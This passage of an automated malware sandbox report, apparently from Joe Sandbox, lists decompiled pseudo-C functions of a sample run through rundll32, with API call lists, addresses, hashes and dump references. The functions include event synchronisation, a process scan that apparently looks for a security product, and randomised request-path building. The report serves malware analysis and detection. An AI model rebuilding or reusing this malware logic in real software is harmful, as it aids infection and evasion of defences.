				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4bfd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4bfd2a4; // 0x24da5a8
				_t3 = _t8 + 0x4bfe836; // 0x61636f4c
				_t25 = 0;
				_t30 = E04BF6AF7(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4bfd2a8, 1, 0, _t30);
					E04BF147E(_t30);
				}
				_t12 =  *0x4bfd25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04BF56A2() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04BF1493(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4bfd110( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04BF7827(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                          0x04bf72f3
                                          0x04bf72fa
                                          0x04bf7304
                                          0x04bf7308
                                          0x04bf730e
                                          0x04bf731d
                                          0x04bf7324
                                          0x04bf7328
                                          0x04bf733a
                                          0x04bf733c
                                          0x04bf733c
                                          0x04bf7341
                                          0x04bf7348
                                          0x04bf739f
                                          0x04bf739f
                                          0x04bf73a5
                                          0x04bf73a7
                                          0x04bf73a7
                                          0x04bf73b1
                                          0x04bf73b5
                                          0x04bf73c7
                                          0x04bf73c7
                                          0x04bf73cb
                                          0x04bf73d1
                                          0x04bf73d1
                                          0x00000000
                                          0x04bf7361
                                          0x04bf7366
                                          0x04bf736e
                                          0x04bf7372
                                          0x04bf7376
                                          0x04bf7376
                                          0x04bf7383
                                          0x04bf7387
                                          0x04bf738b
                                          0x04bf73e0
                                          0x04bf73e6
                                          0x04bf73e6
                                          0x04bf7399
                                          0x04bf739d
                                          0x04bf73d4
                                          0x04bf73d6
                                          0x04bf73d9
                                          0x04bf73d9
                                          0x00000000
                                          0x04bf73d6
                                          0x04bf739d
                                          0x00000000
                                          0x04bf7387

                                          APIs
                                            • Part of subcall function 04BF6AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04BF2098,74666F53,00000000,?,04BFD00C,?,?), ref: 04BF6B2D
                                            • Part of subcall function 04BF6AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6B51
                                            • Part of subcall function 04BF6AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04BF6B59
                                          • CreateEventA.KERNEL32(04BFD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04BF555B,?,?,?), ref: 04BF7333
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04BF555B,00000000,00000000,?,00000000,?,04BF555B,?,?,?), ref: 04BF7393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04BF555B,?,?,?), ref: 04BF73C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04BF555B,?,?,?), ref: 04BF73D9
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: 88e760ff353ff5aeebf2d6b5c3c2df8f7a0ff6eb0a67e308d3e9792a0db07fbf
                                          • Instruction ID: 11d668d2797a83c3a4c12217cf76d6ed753949f119b17b40063dd7ed58285f74
                                          • Opcode Fuzzy Hash: 88e760ff353ff5aeebf2d6b5c3c2df8f7a0ff6eb0a67e308d3e9792a0db07fbf
                                          • Instruction Fuzzy Hash: 3421E332600246BBDB315E7C9C84A6A72A9EB88714B0506F5FF1ED7144DF64EC0B86A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BFA1F1, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 38%
                                          			E04BFA1F1(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x4bfd140; // 0x4bfad41
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04BF58BE(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E04BF147E(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04BF9D3A( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                          0x04bfa1f1
                                          0x04bfa1f1
                                          0x04bfa1fb
                                          0x04bfa201
                                          0x04bfa204
                                          0x04bfa208
                                          0x04bfa20e
                                          0x04bfa213
                                          0x04bfa22c
                                          0x04bfa22f
                                          0x04bfa233
                                          0x04bfa237
                                          0x04bfa238
                                          0x04bfa23d
                                          0x04bfa240
                                          0x04bfa247
                                          0x04bfa24e
                                          0x04bfa2a1
                                          0x04bfa2a7
                                          0x04bfa2ad
                                          0x04bfa2e8
                                          0x04bfa2ee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bfa2ad
                                          0x04bfa254
                                          0x00000000
                                          0x04bfa25b
                                          0x04bfa269
                                          0x04bfa26c
                                          0x04bfa26f
                                          0x04bfa27b
                                          0x04bfa27f
                                          0x04bfa2e1
                                          0x04bfa281
                                          0x04bfa284
                                          0x04bfa288
                                          0x04bfa289
                                          0x04bfa28a
                                          0x04bfa28c
                                          0x04bfa293
                                          0x04bfa2d1
                                          0x04bfa2dc
                                          0x04bfa295
                                          0x04bfa298
                                          0x04bfa29c
                                          0x04bfa29c
                                          0x04bfa293
                                          0x00000000
                                          0x04bfa27f
                                          0x04bfa254
                                          0x04bfa218
                                          0x04bfa21e
                                          0x04bfa221
                                          0x04bfa226
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bfa2b6
                                          0x04bfa2be
                                          0x04bfa2c3
                                          0x04bfa2c6
                                          0x00000000

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04BFA208
                                          • SetEvent.KERNEL32(?), ref: 04BFA218
                                          • GetLastError.KERNEL32 ref: 04BFA2A1
                                            • Part of subcall function 04BF9D3A: WaitForMultipleObjects.KERNEL32(00000002,04BFAA33,00000000,04BFAA33,?,?,?,04BFAA33,0000EA60), ref: 04BF9D55
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • GetLastError.KERNEL32(00000000), ref: 04BFA2D6
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 928bc335ac82a7c6d7fd859fde2c44123aa99b7e1dc081f8554618fbd843e6b0
                                          • Instruction ID: 005407e0ebef041e3aa2b9e7b827a7739755c7c7fc65b6857c93c009598114b5
                                          • Opcode Fuzzy Hash: 928bc335ac82a7c6d7fd859fde2c44123aa99b7e1dc081f8554618fbd843e6b0
                                          • Instruction Fuzzy Hash: E031F475B00209EFDF21DFE5CCC499EBBB8FB09304F1049AAD64AA2141D735BA499F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF54AC, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E04BF54AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04BF4F1F(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E04BF5749(_t23);
						}
					}
					return _t38;
				}
				if(E04BF9138(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4bfd2a8, 1, 0,  *0x4bfd340);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04BF9575(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04BFA642(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04BF568A(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04BF72F2( &_v32, _t39);
					goto L13;
				}
			}












                                          0x04bf54ac
                                          0x04bf54b9
                                          0x04bf54bf
                                          0x04bf54c0
                                          0x04bf54c1
                                          0x04bf54c2
                                          0x04bf54c3
                                          0x04bf54c7
                                          0x04bf54d3
                                          0x04bf54d7
                                          0x04bf555f
                                          0x04bf555f
                                          0x04bf5562
                                          0x04bf5564
                                          0x04bf556c
                                          0x04bf5572
                                          0x04bf5575
                                          0x04bf5575
                                          0x04bf5572
                                          0x04bf5580
                                          0x04bf5580
                                          0x04bf54ea
                                          0x04bf54ec
                                          0x04bf54ec
                                          0x04bf5503
                                          0x04bf5507
                                          0x04bf550a
                                          0x04bf5515
                                          0x04bf551c
                                          0x04bf551c
                                          0x04bf5525
                                          0x04bf5529
                                          0x04bf5537
                                          0x04bf552b
                                          0x04bf552b
                                          0x04bf552c
                                          0x04bf552d
                                          0x04bf552e
                                          0x04bf552f
                                          0x04bf5530
                                          0x04bf5530
                                          0x04bf553c
                                          0x04bf553f
                                          0x04bf5543
                                          0x04bf5545
                                          0x04bf5545
                                          0x04bf554c
                                          0x00000000
                                          0x04bf554e
                                          0x04bf554e
                                          0x04bf555b
                                          0x00000000
                                          0x04bf555b

                                          APIs
                                          • CreateEventA.KERNEL32(04BFD2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 04BF54FD
                                          • SetEvent.KERNEL32(00000000), ref: 04BF550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04BF5515
                                          • CloseHandle.KERNEL32(00000000), ref: 04BF551C
                                            • Part of subcall function 04BF9575: WaitForSingleObject.KERNEL32(00000000,?,?,?,04BF553C,?,04BF553C,?,?,?,?,?,04BF553C,?), ref: 04BF964F
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 76cd870a08a598a85b39ae3b8932daf28630342b5bc2ca119cc0f2786c13aadc
                                          • Instruction ID: 5275a9ac1e729782508d4c96f49afa57c644d009351df84609072d6426e56775
                                          • Opcode Fuzzy Hash: 76cd870a08a598a85b39ae3b8932daf28630342b5bc2ca119cc0f2786c13aadc
                                          • Instruction Fuzzy Hash: 54215672D00119BBDB20AFF4DC84A9E777EEF44354B0544A5EB1EA7101D634FA498BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF4858, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04BF4858(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4bfd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4bfd250; // 0xc9e88f3a
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4bfd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                          0x04bf4860
                                          0x04bf4863
                                          0x04bf4869
                                          0x04bf4881
                                          0x04bf4883
                                          0x04bf4888
                                          0x04bf488a
                                          0x04bf488d
                                          0x04bf488f
                                          0x04bf4892
                                          0x04bf4894
                                          0x04bf4894
                                          0x04bf4896
                                          0x04bf48a1
                                          0x04bf48a6
                                          0x04bf48b7
                                          0x04bf48bf
                                          0x04bf48c4
                                          0x04bf48c7
                                          0x04bf48ca
                                          0x04bf48cc
                                          0x04bf48cf
                                          0x04bf48d2
                                          0x04bf48d2
                                          0x04bf48d5
                                          0x04bf48e0
                                          0x04bf48e5
                                          0x04bf48ef

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BF4DBF,00000000,?,?,04BF52FE,?,070D95B0), ref: 04BF4863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BF487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04BF4DBF,00000000,?,?,04BF52FE,?,070D95B0), ref: 04BF48BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 04BF48E0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 1b715f6abbfb511567cabfdf42d0faa8abf1804bb35fed24ba11cd88ff677278
                                          • Instruction ID: 07bad5fcc4e4d80f535275682eb3759f59b2956f524a2906dddf2ac3f3a0433b
                                          • Opcode Fuzzy Hash: 1b715f6abbfb511567cabfdf42d0faa8abf1804bb35fed24ba11cd88ff677278
                                          • Instruction Fuzzy Hash: 9811A372A00158AFD7108BA9DD84D9EBFAEEBA0350B4541A6F60997240E7749E0497A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF6AF7, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E04BF6AF7(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E04BF6F89(_t8, _t1);
				_t16 = E04BF58BE(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E04BF9038(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E04BF58BE(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E04BF147E(_t16);
				}
				return _t18;
			}









                                          0x04bf6b02
                                          0x04bf6b03
                                          0x04bf6b06
                                          0x04bf6b08
                                          0x04bf6b13
                                          0x04bf6b17
                                          0x04bf6b1c
                                          0x04bf6b20
                                          0x04bf6b28
                                          0x04bf6b2d
                                          0x04bf6b35
                                          0x04bf6b35
                                          0x04bf6b3e
                                          0x04bf6b42
                                          0x04bf6b48
                                          0x04bf6b4b
                                          0x04bf6b51
                                          0x04bf6b51
                                          0x04bf6b59
                                          0x04bf6b59
                                          0x04bf6b60
                                          0x04bf6b60
                                          0x04bf6b6b

                                          APIs
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                            • Part of subcall function 04BF9038: wsprintfA.USER32 ref: 04BF9094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04BF2098,74666F53,00000000,?,04BFD00C,?,?), ref: 04BF6B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04BF6B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04BF6B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: 53b256f1c002350a3c2614275f6fd6a70f22797436560e1a954018737d6d6dd1
                                          • Instruction ID: 62d70cf7ceec48bd10ccc6051448358c8e82ea8622781299389b8446da0b5559
                                          • Opcode Fuzzy Hash: 53b256f1c002350a3c2614275f6fd6a70f22797436560e1a954018737d6d6dd1
                                          • Instruction Fuzzy Hash: 1E01A232100109BBDB222AB89C88EEE3B6CEF84349F0444A1FF0C56106DB39995A87A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF56A2, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04BF56A2() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4bfd2a4; // 0x24da5a8
						_t2 = _t9 + 0x4bfee38; // 0x73617661
						_push( &_v264);
						if( *0x4bfd0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                          0x04bf56ad
                                          0x04bf56b7
                                          0x04bf56bb
                                          0x04bf56c5
                                          0x04bf56f6
                                          0x04bf56cc
                                          0x04bf56d1
                                          0x04bf56de
                                          0x04bf56e7
                                          0x04bf56fe
                                          0x04bf56e9
                                          0x04bf56f1
                                          0x00000000
                                          0x04bf56f1
                                          0x04bf56ff
                                          0x04bf5700
                                          0x00000000
                                          0x04bf5700
                                          0x00000000
                                          0x04bf56fa
                                          0x04bf5706
                                          0x04bf570b

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04BF56B2
                                          • Process32First.KERNEL32(00000000,?), ref: 04BF56C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 04BF56F1
                                          • CloseHandle.KERNEL32(00000000), ref: 04BF5700
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 1d06a3991733cdcf18f7f9b0ac448dd9c265c7bc9a3655e0fe30930252da42bd
                                          • Instruction ID: 7b31753ef4b2cc2b4542ebd145ef98b8f91daa001e9302e2ebe747e7b10ed92b
                                          • Opcode Fuzzy Hash: 1d06a3991733cdcf18f7f9b0ac448dd9c265c7bc9a3655e0fe30930252da42bd
                                          • Instruction Fuzzy Hash: 6DF09672601125BAE730A67A9C48DEB77ACDB85354F000092EF1DC3041F624E94E86B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF7283, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04BF7283(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                          0x04bf728d
                                          0x04bf7291
                                          0x04bf72a6
                                          0x04bf72a8
                                          0x04bf72ad
                                          0x04bf72b3
                                          0x04bf72b5
                                          0x04bf72ba
                                          0x04bf72c5
                                          0x04bf72bc
                                          0x04bf72bc
                                          0x04bf72bc
                                          0x04bf72ba
                                          0x04bf72d3

                                          APIs
                                          • memset.NTDLL ref: 04BF7291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04BF72A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04BF72B3
                                          • CloseHandle.KERNEL32(?), ref: 04BF72C5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 1557f8263caea180e8a06d363d776dcbaee42d740f6d43221bf13094d10ceabe
                                          • Instruction ID: 9ef8d82f2c96ecdfa784caddba80cc31de495cbab77ea8cb82ce661c0e2f2103
                                          • Opcode Fuzzy Hash: 1557f8263caea180e8a06d363d776dcbaee42d740f6d43221bf13094d10ceabe
                                          • Instruction Fuzzy Hash: B1F0F4B110430CBFD7105F75DCC4C2BBBECFB561A8B11496EF54682511DA75A8494A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BFA2EF, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 33stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E04BFA2EF(int __eax, char _a4) {
				void* _v0;
				void* _t12;
				int _t13;
				int _t14;

				_t1 =  &_a4; // 0x4d283a53
				_t14 = __eax;
				__imp__( *_t1);
				_t13 = __eax;
				if(__eax > __eax) {
					_t14 = __eax;
				}
				_t2 = _t14 + 1; // 0x1
				_t12 = E04BF58BE(_t2);
				if(_t12 != 0) {
					memcpy(_t12, _v0, _t13);
					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
				}
				return _t12;
			}







                                          0x04bfa2f2
                                          0x04bfa2f6
                                          0x04bfa2f8
                                          0x04bfa2fe
                                          0x04bfa302
                                          0x04bfa304
                                          0x04bfa304
                                          0x04bfa306
                                          0x04bfa30f
                                          0x04bfa313
                                          0x04bfa31b
                                          0x04bfa32a
                                          0x04bfa32f
                                          0x04bfa337

                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,04BF9AA8,00000000,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40), ref: 04BFA2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,04BF4A8B,?,?,?,4D283A53,?,?), ref: 04BFA31B
                                          • memset.NTDLL ref: 04BFA32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
